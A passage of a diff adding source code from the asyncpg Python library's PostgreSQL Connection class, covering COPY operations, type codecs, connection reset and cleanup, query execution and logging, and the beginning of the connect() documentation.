escape=None, force_quote=None, encoding=None): + """Copy table contents to a file or file-like object. + + :param str table_name: + The name of the table to copy data from. + + :param output: + A :term:`path-like object `, + or a :term:`file-like object `, or + a :term:`coroutine function ` + that takes a ``bytes`` instance as a sole argument. + + :param list columns: + An optional list of column names to copy. + + :param str schema_name: + An optional schema name to qualify the table. + + :param float timeout: + Optional timeout value in seconds. + + The remaining keyword arguments are ``COPY`` statement options, + see `COPY statement documentation`_ for details. + + :return: The status string of the COPY command. + + Example: + + .. code-block:: pycon + + >>> import asyncpg + >>> import asyncio + >>> async def run(): + ... con = await asyncpg.connect(user='postgres') + ... result = await con.copy_from_table( + ... 'mytable', columns=('foo', 'bar'), + ... output='file.csv', format='csv') + ... print(result) + ... + >>> asyncio.run(run()) + 'COPY 100' + + .. _`COPY statement documentation`: + https://www.postgresql.org/docs/current/static/sql-copy.html + + .. versionadded:: 0.11.0 + """ + tabname = utils._quote_ident(table_name) + if schema_name: + tabname = utils._quote_ident(schema_name) + '.' + tabname + + if columns: + cols = '({})'.format( + ', '.join(utils._quote_ident(c) for c in columns)) + else: + cols = '' + + opts = self._format_copy_opts( + format=format, oids=oids, delimiter=delimiter, + null=null, header=header, quote=quote, escape=escape, + force_quote=force_quote, encoding=encoding + ) + + copy_stmt = 'COPY {tab}{cols} TO STDOUT {opts}'.format( + tab=tabname, cols=cols, opts=opts) + + return await self._copy_out(copy_stmt, output, timeout) + + async def copy_from_query(self, query, *args, output, + timeout=None, format=None, oids=None, + delimiter=None, null=None, header=None, + quote=None, escape=None, force_quote=None, + encoding=None): + """Copy the results of a query to a file or file-like object. + + :param str query: + The query to copy the results of. + + :param args: + Query arguments. + + :param output: + A :term:`path-like object `, + or a :term:`file-like object `, or + a :term:`coroutine function ` + that takes a ``bytes`` instance as a sole argument. + + :param float timeout: + Optional timeout value in seconds. + + The remaining keyword arguments are ``COPY`` statement options, + see `COPY statement documentation`_ for details. + + :return: The status string of the COPY command. + + Example: + + .. code-block:: pycon + + >>> import asyncpg + >>> import asyncio + >>> async def run(): + ... con = await asyncpg.connect(user='postgres') + ... result = await con.copy_from_query( + ... 'SELECT foo, bar FROM mytable WHERE foo > $1', 10, + ... output='file.csv', format='csv') + ... print(result) + ... + >>> asyncio.run(run()) + 'COPY 10' + + .. _`COPY statement documentation`: + https://www.postgresql.org/docs/current/static/sql-copy.html + + .. versionadded:: 0.11.0 + """ + opts = self._format_copy_opts( + format=format, oids=oids, delimiter=delimiter, + null=null, header=header, quote=quote, escape=escape, + force_quote=force_quote, encoding=encoding + ) + + if args: + query = await utils._mogrify(self, query, args) + + copy_stmt = 'COPY ({query}) TO STDOUT {opts}'.format( + query=query, opts=opts) + + return await self._copy_out(copy_stmt, output, timeout) + + async def copy_to_table(self, table_name, *, source, + columns=None, schema_name=None, timeout=None, + format=None, oids=None, freeze=None, + delimiter=None, null=None, header=None, + quote=None, escape=None, force_quote=None, + force_not_null=None, force_null=None, + encoding=None, where=None): + """Copy data to the specified table. + + :param str table_name: + The name of the table to copy data to. + + :param source: + A :term:`path-like object `, + or a :term:`file-like object `, or + an :term:`asynchronous iterable ` + that returns ``bytes``, or an object supporting the + :ref:`buffer protocol `. + + :param list columns: + An optional list of column names to copy. + + :param str schema_name: + An optional schema name to qualify the table. + + :param str where: + An optional SQL expression used to filter rows when copying. + + .. note:: + + Usage of this parameter requires support for the + ``COPY FROM ... WHERE`` syntax, introduced in + PostgreSQL version 12. + + :param float timeout: + Optional timeout value in seconds. + + The remaining keyword arguments are ``COPY`` statement options, + see `COPY statement documentation`_ for details. + + :return: The status string of the COPY command. + + Example: + + .. code-block:: pycon + + >>> import asyncpg + >>> import asyncio + >>> async def run(): + ... con = await asyncpg.connect(user='postgres') + ... result = await con.copy_to_table( + ... 'mytable', source='datafile.tbl') + ... print(result) + ... + >>> asyncio.run(run()) + 'COPY 140000' + + .. _`COPY statement documentation`: + https://www.postgresql.org/docs/current/static/sql-copy.html + + .. versionadded:: 0.11.0 + + .. versionadded:: 0.29.0 + Added the *where* parameter. + """ + tabname = utils._quote_ident(table_name) + if schema_name: + tabname = utils._quote_ident(schema_name) + '.' + tabname + + if columns: + cols = '({})'.format( + ', '.join(utils._quote_ident(c) for c in columns)) + else: + cols = '' + + cond = self._format_copy_where(where) + opts = self._format_copy_opts( + format=format, oids=oids, freeze=freeze, delimiter=delimiter, + null=null, header=header, quote=quote, escape=escape, + force_not_null=force_not_null, force_null=force_null, + encoding=encoding + ) + + copy_stmt = 'COPY {tab}{cols} FROM STDIN {opts} {cond}'.format( + tab=tabname, cols=cols, opts=opts, cond=cond) + + return await self._copy_in(copy_stmt, source, timeout) + + async def copy_records_to_table(self, table_name, *, records, + columns=None, schema_name=None, + timeout=None, where=None): + """Copy a list of records to the specified table using binary COPY. + + :param str table_name: + The name of the table to copy data to. + + :param records: + An iterable returning row tuples to copy into the table. + :term:`Asynchronous iterables ` + are also supported. + + :param list columns: + An optional list of column names to copy. + + :param str schema_name: + An optional schema name to qualify the table. + + :param str where: + An optional SQL expression used to filter rows when copying. + + .. note:: + + Usage of this parameter requires support for the + ``COPY FROM ... WHERE`` syntax, introduced in + PostgreSQL version 12. + + + :param float timeout: + Optional timeout value in seconds. + + :return: The status string of the COPY command. + + Example: + + .. code-block:: pycon + + >>> import asyncpg + >>> import asyncio + >>> async def run(): + ... con = await asyncpg.connect(user='postgres') + ... result = await con.copy_records_to_table( + ... 'mytable', records=[ + ... (1, 'foo', 'bar'), + ... (2, 'ham', 'spam')]) + ... print(result) + ... + >>> asyncio.run(run()) + 'COPY 2' + + Asynchronous record iterables are also supported: + + .. code-block:: pycon + + >>> import asyncpg + >>> import asyncio + >>> async def run(): + ... con = await asyncpg.connect(user='postgres') + ... async def record_gen(size): + ... for i in range(size): + ... yield (i,) + ... result = await con.copy_records_to_table( + ... 'mytable', records=record_gen(100)) + ... print(result) + ... + >>> asyncio.run(run()) + 'COPY 100' + + .. versionadded:: 0.11.0 + + .. versionchanged:: 0.24.0 + The ``records`` argument may be an asynchronous iterable. + + .. versionadded:: 0.29.0 + Added the *where* parameter. + """ + tabname = utils._quote_ident(table_name) + if schema_name: + tabname = utils._quote_ident(schema_name) + '.' + tabname + + if columns: + col_list = ', '.join(utils._quote_ident(c) for c in columns) + cols = '({})'.format(col_list) + else: + col_list = '*' + cols = '' + + intro_query = 'SELECT {cols} FROM {tab} LIMIT 1'.format( + tab=tabname, cols=col_list) + + intro_ps = await self.prepare(intro_query) + + cond = self._format_copy_where(where) + opts = '(FORMAT binary)' + + copy_stmt = 'COPY {tab}{cols} FROM STDIN {opts} {cond}'.format( + tab=tabname, cols=cols, opts=opts, cond=cond) + + return await self._protocol.copy_in( + copy_stmt, None, None, records, intro_ps._state, timeout) + + def _format_copy_where(self, where): + if where and not self._server_caps.sql_copy_from_where: + raise exceptions.UnsupportedServerFeatureError( + 'the `where` parameter requires PostgreSQL 12 or later') + + if where: + where_clause = 'WHERE ' + where + else: + where_clause = '' + + return where_clause + + def _format_copy_opts(self, *, format=None, oids=None, freeze=None, + delimiter=None, null=None, header=None, quote=None, + escape=None, force_quote=None, force_not_null=None, + force_null=None, encoding=None): + kwargs = dict(locals()) + kwargs.pop('self') + opts = [] + + if force_quote is not None and isinstance(force_quote, bool): + kwargs.pop('force_quote') + if force_quote: + opts.append('FORCE_QUOTE *') + + for k, v in kwargs.items(): + if v is not None: + if k in ('force_not_null', 'force_null', 'force_quote'): + v = '(' + ', '.join(utils._quote_ident(c) for c in v) + ')' + elif k in ('oids', 'freeze', 'header'): + v = str(v) + else: + v = utils._quote_literal(v) + + opts.append('{} {}'.format(k.upper(), v)) + + if opts: + return '(' + ', '.join(opts) + ')' + else: + return '' + + async def _copy_out(self, copy_stmt, output, timeout): + try: + path = os.fspath(output) + except TypeError: + # output is not a path-like object + path = None + + writer = None + opened_by_us = False + run_in_executor = self._loop.run_in_executor + + if path is not None: + # a path + f = await run_in_executor(None, open, path, 'wb') + opened_by_us = True + elif hasattr(output, 'write'): + # file-like + f = output + elif callable(output): + # assuming calling output returns an awaitable. + writer = output + else: + raise TypeError( + 'output is expected to be a file-like object, ' + 'a path-like object or a coroutine function, ' + 'not {}'.format(type(output).__name__) + ) + + if writer is None: + async def _writer(data): + await run_in_executor(None, f.write, data) + writer = _writer + + try: + return await self._protocol.copy_out(copy_stmt, writer, timeout) + finally: + if opened_by_us: + f.close() + + async def _copy_in(self, copy_stmt, source, timeout): + try: + path = os.fspath(source) + except TypeError: + # source is not a path-like object + path = None + + f = None + reader = None + data = None + opened_by_us = False + run_in_executor = self._loop.run_in_executor + + if path is not None: + # a path + f = await run_in_executor(None, open, path, 'rb') + opened_by_us = True + elif hasattr(source, 'read'): + # file-like + f = source + elif isinstance(source, collections.abc.AsyncIterable): + # assuming calling output returns an awaitable. + # copy_in() is designed to handle very large amounts of data, and + # the source async iterable is allowed to return an arbitrary + # amount of data on every iteration. + reader = source + else: + # assuming source is an instance supporting the buffer protocol. + data = source + + if f is not None: + # Copying from a file-like object. + class _Reader: + def __aiter__(self): + return self + + async def __anext__(self): + data = await run_in_executor(None, f.read, 524288) + if len(data) == 0: + raise StopAsyncIteration + else: + return data + + reader = _Reader() + + try: + return await self._protocol.copy_in( + copy_stmt, reader, data, None, None, timeout) + finally: + if opened_by_us: + await run_in_executor(None, f.close) + + async def set_type_codec(self, typename, *, + schema='public', encoder, decoder, + format='text'): + """Set an encoder/decoder pair for the specified data type. + + :param typename: + Name of the data type the codec is for. + + :param schema: + Schema name of the data type the codec is for + (defaults to ``'public'``) + + :param format: + The type of the argument received by the *decoder* callback, + and the type of the *encoder* callback return value. + + If *format* is ``'text'`` (the default), the exchange datum is a + ``str`` instance containing valid text representation of the + data type. + + If *format* is ``'binary'``, the exchange datum is a ``bytes`` + instance containing valid _binary_ representation of the + data type. + + If *format* is ``'tuple'``, the exchange datum is a type-specific + ``tuple`` of values. The table below lists supported data + types and their format for this mode. + + +-----------------+---------------------------------------------+ + | Type | Tuple layout | + +=================+=============================================+ + | ``interval`` | (``months``, ``days``, ``microseconds``) | + +-----------------+---------------------------------------------+ + | ``date`` | (``date ordinal relative to Jan 1 2000``,) | + | | ``-2^31`` for negative infinity timestamp | + | | ``2^31-1`` for positive infinity timestamp. | + +-----------------+---------------------------------------------+ + | ``timestamp`` | (``microseconds relative to Jan 1 2000``,) | + | | ``-2^63`` for negative infinity timestamp | + | | ``2^63-1`` for positive infinity timestamp. | + +-----------------+---------------------------------------------+ + | ``timestamp | (``microseconds relative to Jan 1 2000 | + | with time zone``| UTC``,) | + | | ``-2^63`` for negative infinity timestamp | + | | ``2^63-1`` for positive infinity timestamp. | + +-----------------+---------------------------------------------+ + | ``time`` | (``microseconds``,) | + +-----------------+---------------------------------------------+ + | ``time with | (``microseconds``, | + | time zone`` | ``time zone offset in seconds``) | + +-----------------+---------------------------------------------+ + | any composite | Composite value elements | + | type | | + +-----------------+---------------------------------------------+ + + :param encoder: + Callable accepting a Python object as a single argument and + returning a value encoded according to *format*. + + :param decoder: + Callable accepting a single argument encoded according to *format* + and returning a decoded Python object. + + Example: + + .. code-block:: pycon + + >>> import asyncpg + >>> import asyncio + >>> import datetime + >>> from dateutil.relativedelta import relativedelta + >>> async def run(): + ... con = await asyncpg.connect(user='postgres') + ... def encoder(delta): + ... ndelta = delta.normalized() + ... return (ndelta.years * 12 + ndelta.months, + ... ndelta.days, + ... ((ndelta.hours * 3600 + + ... ndelta.minutes * 60 + + ... ndelta.seconds) * 1000000 + + ... ndelta.microseconds)) + ... def decoder(tup): + ... return relativedelta(months=tup[0], days=tup[1], + ... microseconds=tup[2]) + ... await con.set_type_codec( + ... 'interval', schema='pg_catalog', encoder=encoder, + ... decoder=decoder, format='tuple') + ... result = await con.fetchval( + ... "SELECT '2 years 3 mons 1 day'::interval") + ... print(result) + ... print(datetime.datetime(2002, 1, 1) + result) + ... + >>> asyncio.run(run()) + relativedelta(years=+2, months=+3, days=+1) + 2004-04-02 00:00:00 + + .. versionadded:: 0.12.0 + Added the ``format`` keyword argument and support for 'tuple' + format. + + .. versionchanged:: 0.12.0 + The ``binary`` keyword argument is deprecated in favor of + ``format``. + + .. versionchanged:: 0.13.0 + The ``binary`` keyword argument was removed in favor of + ``format``. + + .. versionchanged:: 0.29.0 + Custom codecs for composite types are now supported with + ``format='tuple'``. + + .. note:: + + It is recommended to use the ``'binary'`` or ``'tuple'`` *format* + whenever possible and if the underlying type supports it. Asyncpg + currently does not support text I/O for composite and range types, + and some other functionality, such as + :meth:`Connection.copy_to_table`, does not support types with text + codecs. + """ + self._check_open() + settings = self._protocol.get_settings() + typeinfo = await self._introspect_type(typename, schema) + full_typeinfos = [] + if introspection.is_scalar_type(typeinfo): + kind = 'scalar' + elif introspection.is_composite_type(typeinfo): + if format != 'tuple': + raise exceptions.UnsupportedClientFeatureError( + 'only tuple-format codecs can be used on composite types', + hint="Use `set_type_codec(..., format='tuple')` and " + "pass/interpret data as a Python tuple. See an " + "example at https://magicstack.github.io/asyncpg/" + "current/usage.html#example-decoding-complex-types", + ) + kind = 'composite' + full_typeinfos, _ = await self._introspect_types( + (typeinfo['oid'],), 10) + else: + raise exceptions.InterfaceError( + f'cannot use custom codec on type {schema}.{typename}: ' + f'it is neither a scalar type nor a composite type' + ) + if introspection.is_domain_type(typeinfo): + raise exceptions.UnsupportedClientFeatureError( + 'custom codecs on domain types are not supported', + hint='Set the codec on the base type.', + detail=( + 'PostgreSQL does not distinguish domains from ' + 'their base types in query results at the protocol level.' + ) + ) + + oid = typeinfo['oid'] + settings.add_python_codec( + oid, typename, schema, full_typeinfos, kind, + encoder, decoder, format) + + # Statement cache is no longer valid due to codec changes. + self._drop_local_statement_cache() + + async def reset_type_codec(self, typename, *, schema='public'): + """Reset *typename* codec to the default implementation. + + :param typename: + Name of the data type the codec is for. + + :param schema: + Schema name of the data type the codec is for + (defaults to ``'public'``) + + .. versionadded:: 0.12.0 + """ + + typeinfo = await self._introspect_type(typename, schema) + self._protocol.get_settings().remove_python_codec( + typeinfo['oid'], typename, schema) + + # Statement cache is no longer valid due to codec changes. + self._drop_local_statement_cache() + + async def set_builtin_type_codec(self, typename, *, + schema='public', codec_name, + format=None): + """Set a builtin codec for the specified scalar data type. + + This method has two uses. The first is to register a builtin + codec for an extension type without a stable OID, such as 'hstore'. + The second use is to declare that an extension type or a + user-defined type is wire-compatible with a certain builtin + data type and should be exchanged as such. + + :param typename: + Name of the data type the codec is for. + + :param schema: + Schema name of the data type the codec is for + (defaults to ``'public'``). + + :param codec_name: + The name of the builtin codec to use for the type. + This should be either the name of a known core type + (such as ``"int"``), or the name of a supported extension + type. Currently, the only supported extension type is + ``"pg_contrib.hstore"``. + + :param format: + If *format* is ``None`` (the default), all formats supported + by the target codec are declared to be supported for *typename*. + If *format* is ``'text'`` or ``'binary'``, then only the + specified format is declared to be supported for *typename*. + + .. versionchanged:: 0.18.0 + The *codec_name* argument can be the name of any known + core data type. Added the *format* keyword argument. + """ + self._check_open() + typeinfo = await self._introspect_type(typename, schema) + if not introspection.is_scalar_type(typeinfo): + raise exceptions.InterfaceError( + 'cannot alias non-scalar type {}.{}'.format( + schema, typename)) + + oid = typeinfo['oid'] + + self._protocol.get_settings().set_builtin_type_codec( + oid, typename, schema, 'scalar', codec_name, format) + + # Statement cache is no longer valid due to codec changes. + self._drop_local_statement_cache() + + def is_closed(self): + """Return ``True`` if the connection is closed, ``False`` otherwise. + + :return bool: ``True`` if the connection is closed, ``False`` + otherwise. + """ + return self._aborted or not self._protocol.is_connected() + + async def close(self, *, timeout=None): + """Close the connection gracefully. + + :param float timeout: + Optional timeout value in seconds. + + .. versionchanged:: 0.14.0 + Added the *timeout* parameter. + """ + try: + if not self.is_closed(): + await self._protocol.close(timeout) + except (Exception, asyncio.CancelledError): + # If we fail to close gracefully, abort the connection. + self._abort() + raise + finally: + self._cleanup() + + def terminate(self): + """Terminate the connection without waiting for pending data.""" + if not self.is_closed(): + self._abort() + self._cleanup() + + async def _reset(self): + self._check_open() + self._listeners.clear() + self._log_listeners.clear() + + if self._protocol.is_in_transaction() or self._top_xact is not None: + if self._top_xact is None or not self._top_xact._managed: + # Managed transactions are guaranteed to __aexit__ + # correctly. + self._loop.call_exception_handler({ + 'message': 'Resetting connection with an ' + 'active transaction {!r}'.format(self) + }) + + self._top_xact = None + await self.execute("ROLLBACK") + + async def reset(self, *, timeout=None): + """Reset the connection state. + + Calling this will reset the connection session state to a state + resembling that of a newly obtained connection. Namely, an open + transaction (if any) is rolled back, open cursors are closed, + all `LISTEN `_ + registrations are removed, all session configuration + variables are reset to their default values, and all advisory locks + are released. + + Note that the above describes the default query returned by + :meth:`Connection.get_reset_query`. If one overloads the method + by subclassing ``Connection``, then this method will do whatever + the overloaded method returns, except open transactions are always + terminated and any callbacks registered by + :meth:`Connection.add_listener` or :meth:`Connection.add_log_listener` + are removed. + + :param float timeout: + A timeout for resetting the connection. If not specified, defaults + to no timeout. + """ + async with compat.timeout(timeout): + await self._reset() + reset_query = self.get_reset_query() + if reset_query: + await self.execute(reset_query) + + def _abort(self): + # Put the connection into the aborted state. + self._aborted = True + self._protocol.abort() + self._protocol = None + + def _cleanup(self): + self._call_termination_listeners() + # Free the resources associated with this connection. + # This must be called when a connection is terminated. + + if self._proxy is not None: + # Connection is a member of a pool, so let the pool + # know that this connection is dead. + self._proxy._holder._release_on_close() + + self._mark_stmts_as_closed() + self._listeners.clear() + self._log_listeners.clear() + self._query_loggers.clear() + self._clean_tasks() + + def _clean_tasks(self): + # Wrap-up any remaining tasks associated with this connection. + if self._cancellations: + for fut in self._cancellations: + if not fut.done(): + fut.cancel() + self._cancellations.clear() + + def _check_open(self): + if self.is_closed(): + raise exceptions.InterfaceError('connection is closed') + + def _get_unique_id(self, prefix): + global _uid + _uid += 1 + return '__asyncpg_{}_{:x}__'.format(prefix, _uid) + + def _mark_stmts_as_closed(self): + for stmt in self._stmt_cache.iter_statements(): + stmt.mark_closed() + + for stmt in self._stmts_to_close: + stmt.mark_closed() + + self._stmt_cache.clear() + self._stmts_to_close.clear() + + def _maybe_gc_stmt(self, stmt): + if ( + stmt.refs == 0 + and stmt.name + and not self._stmt_cache.has( + (stmt.query, stmt.record_class, stmt.ignore_custom_codec) + ) + ): + # If low-level `stmt` isn't referenced from any high-level + # `PreparedStatement` object and is not in the `_stmt_cache`: + # + # * mark it as closed, which will make it non-usable + # for any `PreparedStatement` or for methods like + # `Connection.fetch()`. + # + # * schedule it to be formally closed on the server. + stmt.mark_closed() + self._stmts_to_close.add(stmt) + + async def _cleanup_stmts(self): + # Called whenever we create a new prepared statement in + # `Connection._get_statement()` and `_stmts_to_close` is + # not empty. + to_close = self._stmts_to_close + self._stmts_to_close = set() + for stmt in to_close: + # It is imperative that statements are cleaned properly, + # so we ignore the timeout. + await self._protocol.close_statement(stmt, protocol.NO_TIMEOUT) + + async def _cancel(self, waiter): + try: + # Open new connection to the server + await connect_utils._cancel( + loop=self._loop, addr=self._addr, params=self._params, + backend_pid=self._protocol.backend_pid, + backend_secret=self._protocol.backend_secret) + except ConnectionResetError as ex: + # On some systems Postgres will reset the connection + # after processing the cancellation command. + if not waiter.done(): + waiter.set_exception(ex) + except asyncio.CancelledError: + # There are two scenarios in which the cancellation + # itself will be cancelled: 1) the connection is being closed, + # 2) the event loop is being shut down. + # In either case we do not care about the propagation of + # the CancelledError, and don't want the loop to warn about + # an unretrieved exception. + pass + except (Exception, asyncio.CancelledError) as ex: + if not waiter.done(): + waiter.set_exception(ex) + finally: + self._cancellations.discard( + asyncio.current_task(self._loop)) + if not waiter.done(): + waiter.set_result(None) + + def _cancel_current_command(self, waiter): + self._cancellations.add(self._loop.create_task(self._cancel(waiter))) + + def _process_log_message(self, fields, last_query): + if not self._log_listeners: + return + + message = exceptions.PostgresLogMessage.new(fields, query=last_query) + + con_ref = self._unwrap() + for cb in self._log_listeners: + if cb.is_async: + self._loop.create_task(cb.cb(con_ref, message)) + else: + self._loop.call_soon(cb.cb, con_ref, message) + + def _call_termination_listeners(self): + if not self._termination_listeners: + return + + con_ref = self._unwrap() + for cb in self._termination_listeners: + if cb.is_async: + self._loop.create_task(cb.cb(con_ref)) + else: + self._loop.call_soon(cb.cb, con_ref) + + self._termination_listeners.clear() + + def _process_notification(self, pid, channel, payload): + if channel not in self._listeners: + return + + con_ref = self._unwrap() + for cb in self._listeners[channel]: + if cb.is_async: + self._loop.create_task(cb.cb(con_ref, pid, channel, payload)) + else: + self._loop.call_soon(cb.cb, con_ref, pid, channel, payload) + + def _unwrap(self): + if self._proxy is None: + con_ref = self + else: + # `_proxy` is not None when the connection is a member + # of a connection pool. Which means that the user is working + # with a `PoolConnectionProxy` instance, and expects to see it + # (and not the actual Connection) in their event callbacks. + con_ref = self._proxy + return con_ref + + def get_reset_query(self): + """Return the query sent to server on connection release. + + The query returned by this method is used by :meth:`Connection.reset`, + which is, in turn, used by :class:`~asyncpg.pool.Pool` before making + the connection available to another acquirer. + + .. versionadded:: 0.30.0 + """ + if self._reset_query is not None: + return self._reset_query + + caps = self._server_caps + + _reset_query = [] + if caps.advisory_locks: + _reset_query.append('SELECT pg_advisory_unlock_all();') + if caps.sql_close_all: + _reset_query.append('CLOSE ALL;') + if caps.notifications and caps.plpgsql: + _reset_query.append('UNLISTEN *;') + if caps.sql_reset: + _reset_query.append('RESET ALL;') + + _reset_query = '\n'.join(_reset_query) + self._reset_query = _reset_query + + return _reset_query + + def _set_proxy(self, proxy): + if self._proxy is not None and proxy is not None: + # Should not happen unless there is a bug in `Pool`. + raise exceptions.InterfaceError( + 'internal asyncpg error: connection is already proxied') + + self._proxy = proxy + + def _check_listeners(self, listeners, listener_type): + if listeners: + count = len(listeners) + + w = exceptions.InterfaceWarning( + '{conn!r} is being released to the pool but has {c} active ' + '{type} listener{s}'.format( + conn=self, c=count, type=listener_type, + s='s' if count > 1 else '')) + + warnings.warn(w) + + def _on_release(self, stacklevel=1): + # Invalidate external references to the connection. + self._pool_release_ctr += 1 + # Called when the connection is about to be released to the pool. + # Let's check that the user has not left any listeners on it. + self._check_listeners( + list(itertools.chain.from_iterable(self._listeners.values())), + 'notification') + self._check_listeners( + self._log_listeners, 'log') + + def _drop_local_statement_cache(self): + self._stmt_cache.clear() + + def _drop_global_statement_cache(self): + if self._proxy is not None: + # This connection is a member of a pool, so we delegate + # the cache drop to the pool. + pool = self._proxy._holder._pool + pool._drop_statement_cache() + else: + self._drop_local_statement_cache() + + def _drop_local_type_cache(self): + self._protocol.get_settings().clear_type_cache() + + def _drop_global_type_cache(self): + if self._proxy is not None: + # This connection is a member of a pool, so we delegate + # the cache drop to the pool. + pool = self._proxy._holder._pool + pool._drop_type_cache() + else: + self._drop_local_type_cache() + + async def reload_schema_state(self): + """Indicate that the database schema information must be reloaded. + + For performance reasons, asyncpg caches certain aspects of the + database schema, such as the layout of composite types. Consequently, + when the database schema changes, and asyncpg is not able to + gracefully recover from an error caused by outdated schema + assumptions, an :exc:`~asyncpg.exceptions.OutdatedSchemaCacheError` + is raised. To prevent the exception, this method may be used to inform + asyncpg that the database schema has changed. + + Example: + + .. code-block:: pycon + + >>> import asyncpg + >>> import asyncio + >>> async def change_type(con): + ... result = await con.fetch('SELECT id, info FROM tbl') + ... # Change composite's attribute type "int"=>"text" + ... await con.execute('ALTER TYPE custom DROP ATTRIBUTE y') + ... await con.execute('ALTER TYPE custom ADD ATTRIBUTE y text') + ... await con.reload_schema_state() + ... for id_, info in result: + ... new = (info['x'], str(info['y'])) + ... await con.execute( + ... 'UPDATE tbl SET info=$2 WHERE id=$1', id_, new) + ... + >>> async def run(): + ... # Initial schema: + ... # CREATE TYPE custom AS (x int, y int); + ... # CREATE TABLE tbl(id int, info custom); + ... con = await asyncpg.connect(user='postgres') + ... async with con.transaction(): + ... # Prevent concurrent changes in the table + ... await con.execute('LOCK TABLE tbl') + ... await change_type(con) + ... + >>> asyncio.run(run()) + + .. versionadded:: 0.14.0 + """ + self._drop_global_type_cache() + self._drop_global_statement_cache() + + async def _execute( + self, + query, + args, + limit, + timeout, + *, + return_status=False, + ignore_custom_codec=False, + record_class=None + ): + with self._stmt_exclusive_section: + result, _ = await self.__execute( + query, + args, + limit, + timeout, + return_status=return_status, + record_class=record_class, + ignore_custom_codec=ignore_custom_codec, + ) + return result + + @contextlib.contextmanager + def query_logger(self, callback): + """Context manager that adds `callback` to the list of query loggers, + and removes it upon exit. + + :param callable callback: + A callable or a coroutine function receiving one argument: + **record**, a LoggedQuery containing `query`, `args`, `timeout`, + `elapsed`, `exception`, `conn_addr`, and `conn_params`. + + Example: + + .. code-block:: pycon + + >>> class QuerySaver: + def __init__(self): + self.queries = [] + def __call__(self, record): + self.queries.append(record.query) + >>> with con.query_logger(QuerySaver()): + >>> await con.execute("SELECT 1") + >>> print(log.queries) + ['SELECT 1'] + + .. versionadded:: 0.29.0 + """ + self.add_query_logger(callback) + yield + self.remove_query_logger(callback) + + @contextlib.contextmanager + def _time_and_log(self, query, args, timeout): + start = time.monotonic() + exception = None + try: + yield + except BaseException as ex: + exception = ex + raise + finally: + elapsed = time.monotonic() - start + record = LoggedQuery( + query=query, + args=args, + timeout=timeout, + elapsed=elapsed, + exception=exception, + conn_addr=self._addr, + conn_params=self._params, + ) + for cb in self._query_loggers: + if cb.is_async: + self._loop.create_task(cb.cb(record)) + else: + self._loop.call_soon(cb.cb, record) + + async def __execute( + self, + query, + args, + limit, + timeout, + *, + return_status=False, + ignore_custom_codec=False, + record_class=None + ): + executor = lambda stmt, timeout: self._protocol.bind_execute( + state=stmt, + args=args, + portal_name='', + limit=limit, + return_extra=return_status, + timeout=timeout, + ) + timeout = self._protocol._get_timeout(timeout) + if self._query_loggers: + with self._time_and_log(query, args, timeout): + result, stmt = await self._do_execute( + query, + executor, + timeout, + record_class=record_class, + ignore_custom_codec=ignore_custom_codec, + ) + else: + result, stmt = await self._do_execute( + query, + executor, + timeout, + record_class=record_class, + ignore_custom_codec=ignore_custom_codec, + ) + return result, stmt + + async def _executemany( + self, + query, + args, + timeout, + return_rows=False, + record_class=None, + ): + executor = lambda stmt, timeout: self._protocol.bind_execute_many( + state=stmt, + args=args, + portal_name='', + timeout=timeout, + return_rows=return_rows, + ) + timeout = self._protocol._get_timeout(timeout) + with self._stmt_exclusive_section: + with self._time_and_log(query, args, timeout): + result, _ = await self._do_execute( + query, executor, timeout, record_class=record_class + ) + return result + + async def _do_execute( + self, + query, + executor, + timeout, + retry=True, + *, + ignore_custom_codec=False, + record_class=None + ): + if timeout is None: + stmt = await self._get_statement( + query, + None, + record_class=record_class, + ignore_custom_codec=ignore_custom_codec, + ) + else: + before = time.monotonic() + stmt = await self._get_statement( + query, + timeout, + record_class=record_class, + ignore_custom_codec=ignore_custom_codec, + ) + after = time.monotonic() + timeout -= after - before + before = after + + try: + if timeout is None: + result = await executor(stmt, None) + else: + try: + result = await executor(stmt, timeout) + finally: + after = time.monotonic() + timeout -= after - before + + except exceptions.OutdatedSchemaCacheError: + # This exception is raised when we detect a difference between + # cached type's info and incoming tuple from the DB (when a type is + # changed by the ALTER TYPE). + # It is not possible to recover (the statement is already done at + # the server's side), the only way is to drop our caches and + # reraise the exception to the caller. + await self.reload_schema_state() + raise + except exceptions.InvalidCachedStatementError: + # PostgreSQL will raise an exception when it detects + # that the result type of the query has changed from + # when the statement was prepared. This may happen, + # for example, after an ALTER TABLE or SET search_path. + # + # When this happens, and there is no transaction running, + # we can simply re-prepare the statement and try once + # again. We deliberately retry only once as this is + # supposed to be a rare occurrence. + # + # If the transaction _is_ running, this error will put it + # into an error state, and we have no choice but to + # re-raise the exception. + # + # In either case we clear the statement cache for this + # connection and all other connections of the pool this + # connection belongs to (if any). + # + # See https://github.com/MagicStack/asyncpg/issues/72 + # and https://github.com/MagicStack/asyncpg/issues/76 + # for discussion. + # + self._drop_global_statement_cache() + if self._protocol.is_in_transaction() or not retry: + raise + else: + return await self._do_execute( + query, executor, timeout, retry=False) + + return result, stmt + + +async def connect(dsn=None, *, + host=None, port=None, + user=None, password=None, passfile=None, + service=None, + servicefile=None, + database=None, + loop=None, + timeout=60, + statement_cache_size=100, + max_cached_statement_lifetime=300, + max_cacheable_statement_size=1024 * 15, + command_timeout=None, + ssl=None, + direct_tls=None, + connection_class=Connection, + record_class=protocol.Record, + server_settings=None, + target_session_attrs=None, + krbsrvname=None, + gsslib=None): + r"""A coroutine to establish a connection to a PostgreSQL server. + + The connection parameters may be specified either as a connection + URI in *dsn*, or as specific keyword arguments, or both. + If both *dsn* and keyword arguments are specified, the latter + override the corresponding values parsed from the connection URI. + The default values for the majority of arguments can be specified + using `environment variables `_. + + Returns a new :class:`~asyncpg.connection.Connection` object. + + :param dsn: + Connection arguments specified using as a single string in the + `libpq connection URI format`_: + ``postgres://user:password@host:port/database?option=value``. + The following options are recognized by asyncpg: ``host``, + ``port``, ``user``, ``database`` (or ``dbname``), ``password``, + ``passfile``, ``sslmode``, ``sslcert``, ``sslkey``, ``sslrootcert``, + and ``sslcrl``. Unlike libpq, asyncpg will treat unrecognized + options as `server settings`_ to be used for the connection. + + .. note:: + + The URI must be *valid*, which means that all components must + be properly quoted with :py:func:`urllib.parse.quote_plus`, and + any literal IPv6 addresses must be enclosed in square brackets. + For example: + + .. code-block:: text + + postgres://dbuser@[fe80::1ff:fe23:4567:890a%25eth0]/dbname + + :param host: + Database host address as one of the following: + + - an IP address or a domain name; + - an absolute path to the directory containing the database + server Unix-domain socket (not supported on Windows); + - a sequence of any of the above, in which case the addresses + will be tried in order, and the first successful connection + will be returned. + + If not specified, asyncpg will try the following, in order: + + - host address(es) parsed from the *dsn* argument, + - the value of the ``PGHOST`` 